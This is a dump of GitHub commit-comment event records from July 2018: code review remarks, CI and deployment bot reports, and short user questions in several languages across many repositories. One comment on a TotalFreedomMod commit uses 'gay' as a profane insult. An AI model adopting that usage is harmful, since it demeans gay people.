{"id":"8041821966","type":"CommitCommentEvent","actor":{"login":"yanniks"},"repo":{"name":"chrisbanes/PhotoView"},"payload":{"comment":{"id":29897891,"position":null,"line":null,"path":null,"commit_id":"44963b73b7305e57c5b9c979952e4662bd91b497","created_at":"2018-07-31T05:29:00Z","updated_at":"2018-07-31T05:29:00Z","author_association":"CONTRIBUTOR","body":"Obviously, I wasn't very awake when I sent that PR. I'll submit another PR immediately!"}},"created_at":"2018-07-31T05:29:00Z"}
{"id":"8041822025","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29897892,"position":9,"line":310,"path":"apertium-uig-tur.uig-tur.lrx","commit_id":"0eb52cd39d894c46a5ae11e514a9f81ab3ee73fe","created_at":"2018-07-31T05:29:01Z","updated_at":"2018-07-31T05:29:01Z","author_association":"COLLABORATOR","body":"This rule could be more precise :D"}},"created_at":"2018-07-31T05:29:01Z"}
{"id":"8041822319","type":"CommitCommentEvent","actor":{"login":"schillic"},"repo":{"name":"ultimate-pa/ultimate"},"payload":{"comment":{"id":29897893,"position":15,"line":815,"path":"trunk/source/Library-ModelCheckerUtils/src/de/uni_freiburg/informatik/ultimate/modelcheckerutils/smt/SmtUtils.java","commit_id":"5e4cc2deea28fd1c5806b6919bad8e78afa2374e","created_at":"2018-07-31T05:29:08Z","updated_at":"2018-07-31T05:29:08Z","author_association":"MEMBER","body":"@Heizmann: If I understand correctly, a counterexample could be an equality of two Boolean expressions `(= true true)` vs. an equality of non-Boolean expressions `(= 1 1)`."}},"created_at":"2018-07-31T05:29:08Z"}
{"id":"8041823375","type":"CommitCommentEvent","actor":{"login":"schillic"},"repo":{"name":"ultimate-pa/ultimate"},"payload":{"comment":{"id":29897897,"position":23,"line":823,"path":"trunk/source/Library-ModelCheckerUtils/src/de/uni_freiburg/informatik/ultimate/modelcheckerutils/smt/SmtUtils.java","commit_id":"5e4cc2deea28fd1c5806b6919bad8e78afa2374e","created_at":"2018-07-31T05:29:29Z","updated_at":"2018-07-31T05:29:29Z","author_association":"MEMBER","body":"@Heizmann: Constants are [nullary](https://en.wikipedia.org/wiki/Arity#Nullary)."}},"created_at":"2018-07-31T05:29:29Z"}
{"id":"8041824620","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29897898,"position":56,"line":51,"path":"Lesson3/train.rb","commit_id":"3739340bb74a9e0d2b41394fd1fcf56a0ead6b13","created_at":"2018-07-31T05:29:55Z","updated_at":"2018-07-31T05:29:55Z","author_association":"NONE","body":"можешь оставить, как есть\r\nпросто рекомендация\r\nобычно рекомендуется, чтобы не писать много магических цифр оперировать какими-то более простыми понятиями (даже если код будет несколько сложнее)\r\nк примеру здесь можно было бы написать так:\r\n```ruby\r\nif current_position != route.first_station\r\n```\r\nв таком виде код читается и понимается сразу\r\nнад цифрами еще надо подумать\r\n(аналогично для \"следующей станции\")"}},"created_at":"2018-07-31T05:29:55Z"}
{"id":"8041826038","type":"CommitCommentEvent","actor":{"login":"sinny777"},"repo":{"name":"sinny777/profile"},"payload":{"comment":{"id":29897902,"position":null,"line":null,"path":null,"commit_id":"6244e066aca1b14daaa68b99097e04d52d1fda20","created_at":"2018-07-31T05:30:23Z","updated_at":"2018-07-31T05:30:23Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/54dc1869-9fc9-47a7-99e9-42bb54703fd1?env_id=ibm%3Ayp%3Aus-south \"all-about-gurvinder\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/da1551f6-cb67-47a6-9d9b-90e55ea03d09?env_id=ibm%3Ayp%3Aus-south \"profile\") deployed [profile](https://github.com/sinny777/profile/releases/tag/deploy-ibm-yp-us-south-sinny777-gmail.com-dev-20180731-053022 \"deploy-ibm-yp-us-south-sinny777-gmail.com-dev-20180731-053022\") to [dev](https://console.bluemix.net/apps/c1a52446-832b-4bcd-8c5f-796db62d8575?env_id=ibm:yp:us-south \"ibm:yp:us-south:sinny777@gmail.com:dev\"), including this commit"}},"created_at":"2018-07-31T05:30:23Z"}
{"id":"8041827046","type":"CommitCommentEvent","actor":{"login":"populist"},"repo":{"name":"badcamp/badcamp-2018"},"payload":{"comment":{"id":29897905,"position":null,"line":null,"path":null,"commit_id":"41741a0608b11233d637f3d269b378b80b4dabc3","created_at":"2018-07-31T05:30:45Z","updated_at":"2018-07-31T05:30:45Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [badcamp-2018#pr-142](https://dashboard.pantheon.io/sites/0cebc770-0754-4f81-9138-24661ae588a0#pr-142).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-142-badcamp-2018.pantheonsite.io/)"}},"created_at":"2018-07-31T05:30:45Z"}
{"id":"8041828598","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29897908,"position":51,"line":46,"path":"Lesson3/train.rb","commit_id":"3739340bb74a9e0d2b41394fd1fcf56a0ead6b13","created_at":"2018-07-31T05:31:16Z","updated_at":"2018-07-31T05:31:16Z","author_association":"NONE","body":"префикс \"гет\" вообще не рекомендуется использовать в большинстве случаев"}},"created_at":"2018-07-31T05:31:16Z"}
{"id":"8041829548","type":"CommitCommentEvent","actor":{"login":"tiliarou"},"repo":{"name":"joel16/NX-Shell"},"payload":{"comment":{"id":29897909,"position":null,"line":null,"path":null,"commit_id":"194deca202c91df7ecddea3c1427649836fbc3a4","created_at":"2018-07-31T05:31:37Z","updated_at":"2018-07-31T05:31:37Z","author_association":"NONE","body":"Do you plan to add the travis build status badge in the homepage so we can see travis builds ?"}},"created_at":"2018-07-31T05:31:37Z"}
{"id":"8041837696","type":"CommitCommentEvent","actor":{"login":"ChenXbFrank"},"repo":{"name":"ityouknow/spring-boot-examples"},"payload":{"comment":{"id":29897923,"position":null,"line":null,"path":null,"commit_id":"e73f99b81323e05b01ffedb68b7fa0f95c493a3f","created_at":"2018-07-31T05:34:35Z","updated_at":"2018-07-31T05:34:35Z","author_association":"NONE","body":"为什么我引入工程报错了，jar问题"}},"created_at":"2018-07-31T05:34:35Z"}
{"id":"8041844786","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29897927,"position":null,"line":null,"path":null,"commit_id":"a3a7ce50921f9276dc5047cae9cbc0f32c1f6f77","created_at":"2018-07-31T05:37:16Z","updated_at":"2018-07-31T05:37:16Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-MacOS-10.9-clang: OK (2964 of 2964 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a3a7ce50921f9276dc5047cae9cbc0f32c1f6f77-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a3a7ce50921f9276dc5047cae9cbc0f32c1f6f77-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T05:37:16Z"}
{"id":"8041848789","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29897934,"position":null,"line":null,"path":null,"commit_id":"a9229354d2254f0fb26473c43ff44ecc61ba83dc","created_at":"2018-07-31T05:38:39Z","updated_at":"2018-07-31T05:38:39Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/104/display/redirect) (on internal Jenkins) failed in stage 'Running XM tests on '10.14'' 🔥 : hudson.AbortException: Xamarin.Mac tests on macOS 10.14 failed (introspection)\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/104//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/a9229354d2254f0fb26473c43ff44ecc61ba83dc/104/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/a9229354d2254f0fb26473c43ff44ecc61ba83dc/104/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/a9229354d2254f0fb26473c43ff44ecc61ba83dc/104/jenkins-results/generator-diff/index.html) (only version changes)\n🔥 [Xamarin.Mac tests on macOS 10.14 failed (introspection)](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/104/display/redirect) 🔥\n🔥 [Test run failed](http://xamarin-storage/jenkins/xamarin-macios/xcode10/a9229354d2254f0fb26473c43ff44ecc61ba83dc/104/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n1 tests failed, 160 tests passed.\n\n## Failed tests\n\n * introspection/iOS Unified 32-bits - simulator/Debug: Failed\n"}},"created_at":"2018-07-31T05:38:39Z"}
{"id":"8041850509","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29897937,"position":24,"line":26,"path":"tests/TicTacToeTest.php","commit_id":"2c4600804ea278039e6818b2183ec7fe284f2537","created_at":"2018-07-31T05:39:18Z","updated_at":"2018-07-31T05:39:18Z","author_association":"NONE","body":"Oh. Make it a method.\r\n\r\n"}},"created_at":"2018-07-31T05:39:18Z"}
{"id":"8041862715","type":"CommitCommentEvent","actor":{"login":"paralleltree"},"repo":{"name":"paralleltree/Ched"},"payload":{"comment":{"id":29897956,"position":null,"line":null,"path":null,"commit_id":"93255204b107d785aaae7e535c58de68edbcafe9","created_at":"2018-07-31T05:43:43Z","updated_at":"2018-07-31T05:43:43Z","author_association":"OWNER","body":"#15 への言い訳"}},"created_at":"2018-07-31T05:43:43Z"}
{"id":"8041863353","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29897958,"position":null,"line":null,"path":null,"commit_id":"279d066e1b68808a22c5fbc3f276a79f93a878e0","created_at":"2018-07-31T05:43:58Z","updated_at":"2018-07-31T05:43:58Z","author_association":"MEMBER","body":"You're supposed to use the utility classes that distinguish device implementations and interfaces for this."}},"created_at":"2018-07-31T05:43:58Z"}
{"id":"8041865084","type":"CommitCommentEvent","actor":{"login":"andylokandy"},"repo":{"name":"dcao/elba"},"payload":{"comment":{"id":29897961,"position":121,"line":376,"path":"src/lib/retrieve/cache.rs","commit_id":"4ef3cc4cb96773240e571d34a66b46fa2e3a4e03","created_at":"2018-07-31T05:44:36Z","updated_at":"2018-07-31T05:44:36Z","author_association":"CONTRIBUTOR","body":"create_dir_all does not complain about the existed folder while tje create_dir do."}},"created_at":"2018-07-31T05:44:36Z"}
{"id":"8041865849","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29897962,"position":null,"line":null,"path":null,"commit_id":"2c43d0b852bf1e81e092fb674ad6a6188ee0afb4","created_at":"2018-07-31T05:44:51Z","updated_at":"2018-07-31T05:44:51Z","author_association":"NONE","body":"158922394_Issue#4431 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1706 of 1706 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2c43d0b852bf1e81e092fb674ad6a6188ee0afb4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2c43d0b852bf1e81e092fb674ad6a6188ee0afb4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2c43d0b852bf1e81e092fb674ad6a6188ee0afb4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.41%25-green.png)</a>\n"}},"created_at":"2018-07-31T05:44:51Z"}
{"id":"8041865991","type":"CommitCommentEvent","actor":{"login":"qi777xj"},"repo":{"name":"qi777xj/cpuminer"},"payload":{"comment":{"id":29897963,"position":null,"line":null,"path":null,"commit_id":"11c648e3873c4ab10df4f5da44c0f790aa558192","created_at":"2018-07-31T05:44:54Z","updated_at":"2018-07-31T05:44:54Z","author_association":"OWNER","body":"새 폴더 만들려고 한 것.\r\n깃헙 쓴지 얼마 안 돼서..."}},"created_at":"2018-07-31T05:44:54Z"}
{"id":"8041868466","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29897968,"position":null,"line":null,"path":null,"commit_id":"796abaf7f3200a96499440a4c40bec3440d55209","created_at":"2018-07-31T05:45:49Z","updated_at":"2018-07-31T05:45:49Z","author_association":"MEMBER","body":"Did you not notice I've already solved this using `std::enable_if`?"}},"created_at":"2018-07-31T05:45:49Z"}
{"id":"8041870872","type":"CommitCommentEvent","actor":{"login":"joel16"},"repo":{"name":"joel16/NX-Shell"},"payload":{"comment":{"id":29897972,"position":null,"line":null,"path":null,"commit_id":"194deca202c91df7ecddea3c1427649836fbc3a4","created_at":"2018-07-31T05:46:40Z","updated_at":"2018-07-31T05:46:40Z","author_association":"OWNER","body":"@tiliarou I'm planning on adding 'nightly' support. Well more like 'commit-ly' since it builds after each commit I guess. So yes I'll add that as well."}},"created_at":"2018-07-31T05:46:40Z"}
{"id":"8041881541","type":"CommitCommentEvent","actor":{"login":"tiliarou"},"repo":{"name":"joel16/NX-Shell"},"payload":{"comment":{"id":29897992,"position":null,"line":null,"path":null,"commit_id":"194deca202c91df7ecddea3c1427649836fbc3a4","created_at":"2018-07-31T05:50:27Z","updated_at":"2018-07-31T05:50:27Z","author_association":"NONE","body":"awesome :)"}},"created_at":"2018-07-31T05:50:27Z"}
{"id":"8041881587","type":"CommitCommentEvent","actor":{"login":"dilipdevaraj-sfdc"},"repo":{"name":"salesforce/Argus"},"payload":{"comment":{"id":29897993,"position":6,"line":191,"path":"ArgusCore/src/main/java/com/salesforce/dva/argus/entity/MetricSchemaRecordQuery.java","commit_id":"a3927a5154cd4790019b8f2c73731f648d943567","created_at":"2018-07-31T05:50:28Z","updated_at":"2018-07-31T05:50:28Z","author_association":"CONTRIBUTOR","body":"@sundeepsf \r\nLooks like there are unintended new develop commits too in release 2.17.0 branch.\r\n\r\nFor hot fix please clone release branch, and push changes from you local release branch to origin release branch. \r\nDo not push changes from your local develop to origin release branch. - since this will pull in unintended changes."}},"created_at":"2018-07-31T05:50:28Z"}
{"id":"8041881726","type":"CommitCommentEvent","actor":{"login":"andylokandy"},"repo":{"name":"dcao/elba"},"payload":{"comment":{"id":29897994,"position":59,"line":21,"path":"src/lib/build/job.rs","commit_id":"4ef3cc4cb96773240e571d34a66b46fa2e3a4e03","created_at":"2018-07-31T05:50:31Z","updated_at":"2018-07-31T05:50:31Z","author_association":"CONTRIBUTOR","body":"We need to ensure the map() keeps the NodeIndex in graph structure. I prefer the graph.inner.map()."}},"created_at":"2018-07-31T05:50:31Z"}
{"id":"8041881760","type":"CommitCommentEvent","actor":{"login":"Vishu-Chaudhary"},"repo":{"name":"Vishu-Chaudhary/myresume-react-client"},"payload":{"comment":{"id":29897995,"position":null,"line":null,"path":null,"commit_id":"b1911ede763aac317ddd5e349e03f8abd0640169","created_at":"2018-07-31T05:50:32Z","updated_at":"2018-07-31T05:50:32Z","author_association":"OWNER","body":"Hi adding training details is not working going into .catch(error=>{}) check console at http://proresume.ml"}},"created_at":"2018-07-31T05:50:32Z"}
{"id":"8041882983","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-aggregation-feedstock"},"payload":{"comment":{"id":29897997,"position":null,"line":null,"path":null,"commit_id":"dbc64d56da4b1c4355a1c9dee965d8548eb87481","created_at":"2018-07-31T05:50:56Z","updated_at":"2018-07-31T05:50:56Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @apcamargo was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-31T05:50:56Z"}
{"id":"8041887965","type":"CommitCommentEvent","actor":{"login":"LuJiHui"},"repo":{"name":"TryGhost/Ghost"},"payload":{"comment":{"id":29898004,"position":3,"line":3,"path":"core/server/api/configuration.js","commit_id":"104a4a5c924fcb5b584c08d515eacfdec1a961a3","created_at":"2018-07-31T05:52:38Z","updated_at":"2018-07-31T05:52:38Z","author_association":"NONE","body":"is low"}},"created_at":"2018-07-31T05:52:38Z"}
{"id":"8041891166","type":"CommitCommentEvent","actor":{"login":"poojajogi"},"repo":{"name":"poojajogi/NewProj"},"payload":{"comment":{"id":29898013,"position":null,"line":null,"path":null,"commit_id":"9b0f649c26d5143915f02e25e7bbc26832835660","created_at":"2018-07-31T05:53:42Z","updated_at":"2018-07-31T05:53:42Z","author_association":"OWNER","body":"merging"}},"created_at":"2018-07-31T05:53:42Z"}
{"id":"8041894960","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29898016,"position":25,"line":539,"path":"src/emu/devfind.h","commit_id":"796abaf7f3200a96499440a4c40bec3440d55209","created_at":"2018-07-31T05:54:58Z","updated_at":"2018-07-31T05:54:58Z","author_association":"MEMBER","body":"This will crash if the device is replaced because the device finder never retains its tag.  The full tag is a `std::string` member of `device_t` so if `object` gets replaced it will be freed, and you'll get a use-after-free when the finder is resolved.  I can't see an easy way to implement binding using a reference that doesn't either break when devices are replaced (as the current AJR implementation does), or massively increase the footprint of the `device_finder` instances by storing a string in them."}},"created_at":"2018-07-31T05:54:58Z"}
{"id":"8041897558","type":"CommitCommentEvent","actor":{"login":"SaqerALghamdi"},"repo":{"name":"naser3002/MegaGoal03"},"payload":{"comment":{"id":29898024,"position":null,"line":null,"path":null,"commit_id":"b5b1f2b6ab155f8a54cce3c26c8c2fe9ecf5dc63","created_at":"2018-07-31T05:55:52Z","updated_at":"2018-07-31T05:55:52Z","author_association":"NONE","body":"Good job"}},"created_at":"2018-07-31T05:55:52Z"}
{"id":"8041908192","type":"CommitCommentEvent","actor":{"login":"syedmehralishah"},"repo":{"name":"syedmehralishah/AndroidQuizApp"},"payload":{"comment":{"id":29898039,"position":null,"line":null,"path":null,"commit_id":"8c5218d381fc08fca493564ef9b596d2846fccfe","created_at":"2018-07-31T05:59:30Z","updated_at":"2018-07-31T05:59:30Z","author_association":"OWNER","body":"how can i delete any student in a class after registration from teacher end"}},"created_at":"2018-07-31T05:59:30Z"}
{"id":"8041909331","type":"CommitCommentEvent","actor":{"login":"andylokandy"},"repo":{"name":"dcao/elba"},"payload":{"comment":{"id":29898041,"position":59,"line":21,"path":"src/lib/build/job.rs","commit_id":"37b9b97fcb9f222656cc5f30261d561256f07e09","created_at":"2018-07-31T05:59:52Z","updated_at":"2018-07-31T05:59:52Z","author_association":"CONTRIBUTOR","body":"W have to ensure the map(_) keeps the NodeIndex in graph structure. I prefer the graph.inner.map()."}},"created_at":"2018-07-31T05:59:52Z"}
{"id":"8041911902","type":"CommitCommentEvent","actor":{"login":"andylokandy"},"repo":{"name":"dcao/elba"},"payload":{"comment":{"id":29898061,"position":121,"line":376,"path":"src/lib/retrieve/cache.rs","commit_id":"37b9b97fcb9f222656cc5f30261d561256f07e09","created_at":"2018-07-31T06:00:38Z","updated_at":"2018-07-31T06:00:38Z","author_association":"CONTRIBUTOR","body":"create_dir_all does not complain about the existed folder while the create_dir do."}},"created_at":"2018-07-31T06:00:38Z"}
{"id":"8041912081","type":"CommitCommentEvent","actor":{"login":"feruzm"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29898064,"position":null,"line":null,"path":null,"commit_id":"1b63406dc95879f6bf0f1d7e0a99d04ba3801b81","created_at":"2018-07-31T06:00:42Z","updated_at":"2018-07-31T06:00:42Z","author_association":"MEMBER","body":"looks great!"}},"created_at":"2018-07-31T06:00:42Z"}
{"id":"8041912843","type":"CommitCommentEvent","actor":{"login":"DOP4MIN3"},"repo":{"name":"DOP4MIN3/pcap_test"},"payload":{"comment":{"id":29898066,"position":null,"line":null,"path":null,"commit_id":"408efde7a11389e61e1293d25dc2a0f20abda7d5","created_at":"2018-07-31T06:00:57Z","updated_at":"2018-07-31T06:00:57Z","author_association":"OWNER","body":"First commit"}},"created_at":"2018-07-31T06:00:57Z"}
{"id":"8041917211","type":"CommitCommentEvent","actor":{"login":"mrobaczyk"},"repo":{"name":"mrobaczyk/Stockfish"},"payload":{"comment":{"id":29898077,"position":null,"line":null,"path":null,"commit_id":"e6ef153938cbb6c6a1a127fe5c58065d03c719fb","created_at":"2018-07-31T06:02:22Z","updated_at":"2018-07-31T06:02:22Z","author_association":"OWNER","body":"@snicolet I have a question, what are the requirements for yellow STC patch to run LTC? I've seen there is a practice for running speculative LTCs. Does my 60k STC yellow patch have any chance to pass LTC? And why it went yellow if it says it's gaining 1.46 elo? Thanks for answer."}},"created_at":"2018-07-31T06:02:22Z"}
{"id":"8041921174","type":"CommitCommentEvent","actor":{"login":"qi777xj"},"repo":{"name":"qi777xj/cpuminer"},"payload":{"comment":{"id":29898084,"position":null,"line":null,"path":null,"commit_id":"dbc77126e60472adadc91ff5796f9a0cfe159b06","created_at":"2018-07-31T06:03:40Z","updated_at":"2018-07-31T06:03:40Z","author_association":"OWNER","body":"일단 문구 없어도 컴파일 되는 건 확인했는데,\r\n워닝 거슬려서 땜빵용으로 넣은 거긴 하지만 아직 문제는 없으니 일단 넣어 놓음.\r\n사실 저 문구 지우고 그냥 yespower 폴더 안에 있는 거 다 꺼낸 다음 Makefile.am 수정해도 무방\r\n "}},"created_at":"2018-07-31T06:03:40Z"}
{"id":"8041928501","type":"CommitCommentEvent","actor":{"login":"se1108"},"repo":{"name":"se1108/icechoc"},"payload":{"comment":{"id":29898103,"position":null,"line":null,"path":null,"commit_id":"99c402018e09bade74b24eed8447b781e65efac3","created_at":"2018-07-31T06:06:02Z","updated_at":"2018-07-31T06:06:02Z","author_association":"OWNER","body":"이 코멘트는 뭐지?"}},"created_at":"2018-07-31T06:06:02Z"}
{"id":"8041931357","type":"CommitCommentEvent","actor":{"login":"aidanjohnson"},"repo":{"name":"aidanjohnson/dt7816"},"payload":{"comment":{"id":29898111,"position":null,"line":null,"path":null,"commit_id":"34fa7903e57c79380f5e21553e97c75350303359","created_at":"2018-07-31T06:06:56Z","updated_at":"2018-07-31T06:06:56Z","author_association":"OWNER","body":"@funnyabc, sorry again (I misread the GitHub help 🤦‍♂️), I think I've restored things back to how they were. For some reason I think the issue templates, which seem not to be recognised by [the internal settings](https://github.com/aidanjohnson/dt7816/community), need to be put in the folder `.github/ISSUE_TEMPLATE/` and have three  `.md` templates called (1) `bug_report.md`, (2) `eature_request.md`, and (3) `custom.md`."}},"created_at":"2018-07-31T06:06:56Z"}
{"id":"8041931469","type":"CommitCommentEvent","actor":{"login":"Telesphoreo"},"repo":{"name":"TFPatches/TotalFreedomMod"},"payload":{"comment":{"id":29898112,"position":null,"line":null,"path":null,"commit_id":"12f023196abfdc75f8b430863a4c8ec222a3130b","created_at":"2018-07-31T06:06:58Z","updated_at":"2018-07-31T06:06:58Z","author_association":"NONE","body":"holy shit thats gay"}},"created_at":"2018-07-31T06:06:58Z"}
{"id":"8041933905","type":"CommitCommentEvent","actor":{"login":"se1108"},"repo":{"name":"se1108/icechoc"},"payload":{"comment":{"id":29898115,"position":10,"line":7,"path":"README.md","commit_id":"99c402018e09bade74b24eed8447b781e65efac3","created_at":"2018-07-31T06:07:43Z","updated_at":"2018-07-31T06:07:43Z","author_association":"OWNER","body":"마스터ㅓㅓㅓㅓㅜ"}},"created_at":"2018-07-31T06:07:43Z"}
{"id":"8041935467","type":"CommitCommentEvent","actor":{"login":"shanecoughlan"},"repo":{"name":"OpenChain-Project/Onboarding-JWG"},"payload":{"comment":{"id":29898116,"position":null,"line":null,"path":null,"commit_id":"4e65996e4d5f70068e3b26f78ace0c02ce1847a9","created_at":"2018-07-31T06:08:13Z","updated_at":"2018-07-31T06:08:13Z","author_association":"CONTRIBUTOR","body":"I think that works!"}},"created_at":"2018-07-31T06:08:13Z"}
{"id":"8041939406","type":"CommitCommentEvent","actor":{"login":"zhanhb"},"repo":{"name":"CarpenterLee/JCFInternals"},"payload":{"comment":{"id":29898122,"position":10,"line":10,"path":"markdown/9-WeakHashMap.md","commit_id":"832c4d6fbaf6d411ac10012ee62c5fd2915f1983","created_at":"2018-07-31T06:09:27Z","updated_at":"2018-07-31T06:09:27Z","author_association":"NONE","body":"两次调用containsKey()方法，第一次返回true，第二次返回false，尽管两次使用的是同一个key；\r\n两次调用get()方法，第一次返回一个value，第二次返回null，尽管两次使用的是同一个对象。\r\n这两个不可能发生。两次使用的是同一个key，表示这个对象仍然存活，因此该键不会被回收，因此不可能出现第一次和第二次不同结果"}},"created_at":"2018-07-31T06:09:27Z"}
{"id":"8041939917","type":"CommitCommentEvent","actor":{"login":"zanchey"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":29898124,"position":null,"line":null,"path":null,"commit_id":"3561f36cc493247603e20fd01b9fb1720dc3a517","created_at":"2018-07-31T06:09:37Z","updated_at":"2018-07-31T06:09:37Z","author_association":"MEMBER","body":"Yes. My rationale is that they are a relatively small change that is not particularly actionable by users, but which come to dominate the notes!"}},"created_at":"2018-07-31T06:09:37Z"}
{"id":"8041940777","type":"CommitCommentEvent","actor":{"login":"zhanhb"},"repo":{"name":"CarpenterLee/JCFInternals"},"payload":{"comment":{"id":29898128,"position":11,"line":11,"path":"markdown/9-WeakHashMap.md","commit_id":"832c4d6fbaf6d411ac10012ee62c5fd2915f1983","created_at":"2018-07-31T06:09:53Z","updated_at":"2018-07-31T06:09:53Z","author_association":"NONE","body":"后两个不可能发生。两次使用的是同一个key，表示这个对象仍然存活，因此该键不会被回收，因此不可能出现第一次和第二次不同结果"}},"created_at":"2018-07-31T06:09:53Z"}
{"id":"8041942253","type":"CommitCommentEvent","actor":{"login":"houjb"},"repo":{"name":"ftc300/analysis-statistic"},"payload":{"comment":{"id":29898131,"position":null,"line":null,"path":null,"commit_id":"5426000a4bd9402deee32f917a63de805b9d26eb","created_at":"2018-07-31T06:10:21Z","updated_at":"2018-07-31T06:10:21Z","author_association":"NONE","body":"您好，有个问题，想咨询一下您传感器放置位置，数据的具体情况以及您的算法介绍？希望收到您的回复！"}},"created_at":"2018-07-31T06:10:21Z"}
{"id":"8041951196","type":"CommitCommentEvent","actor":{"login":"lazzyms"},"repo":{"name":"lazzyms/lazzyms.github.io"},"payload":{"comment":{"id":29898152,"position":null,"line":null,"path":null,"commit_id":"c7ceedfbd6f1c58f7f47aaa9792aab6a559a08ac","created_at":"2018-07-31T06:13:07Z","updated_at":"2018-07-31T06:13:07Z","author_association":"OWNER","body":"revert"}},"created_at":"2018-07-31T06:13:07Z"}
{"id":"8041954972","type":"CommitCommentEvent","actor":{"login":"cryptozeny"},"repo":{"name":"qi777xj/cpuminer"},"payload":{"comment":{"id":29898155,"position":null,"line":null,"path":null,"commit_id":"dbc77126e60472adadc91ff5796f9a0cfe159b06","created_at":"2018-07-31T06:14:14Z","updated_at":"2018-07-31T06:14:14Z","author_association":"NONE","body":"문제가 .S 파일이 다바뀌고 S.orig생김 어셈블리 코든데 좀 애매하다"}},"created_at":"2018-07-31T06:14:14Z"}
{"id":"8041955237","type":"CommitCommentEvent","actor":{"login":"abdoulline"},"repo":{"name":"spandeyehep/cmssw"},"payload":{"comment":{"id":29898157,"position":null,"line":null,"path":null,"commit_id":"e90bf2105d8c5ca3c3192a191d8f6f2e2bf60275","created_at":"2018-07-31T06:14:19Z","updated_at":"2018-07-31T06:14:19Z","author_association":"NONE","body":"Well... all three instances of hep17 modifications should come as simple \r\nhep17 = False  \r\n(and not as hep17 = cms.untracked.bool(False) )"}},"created_at":"2018-07-31T06:14:19Z"}
{"id":"8041991842","type":"CommitCommentEvent","actor":{"login":"EuroCentiem-dev"},"repo":{"name":"MintcoinCommunity/Mintcoin-Desktop-Wallet"},"payload":{"comment":{"id":29898217,"position":null,"line":null,"path":null,"commit_id":"8899a295b56c547fd7934f9d2dad6c4d9b202d61","created_at":"2018-07-31T06:25:08Z","updated_at":"2018-07-31T06:25:08Z","author_association":"NONE","body":"I doubt that this site is the correct one"}},"created_at":"2018-07-31T06:25:08Z"}
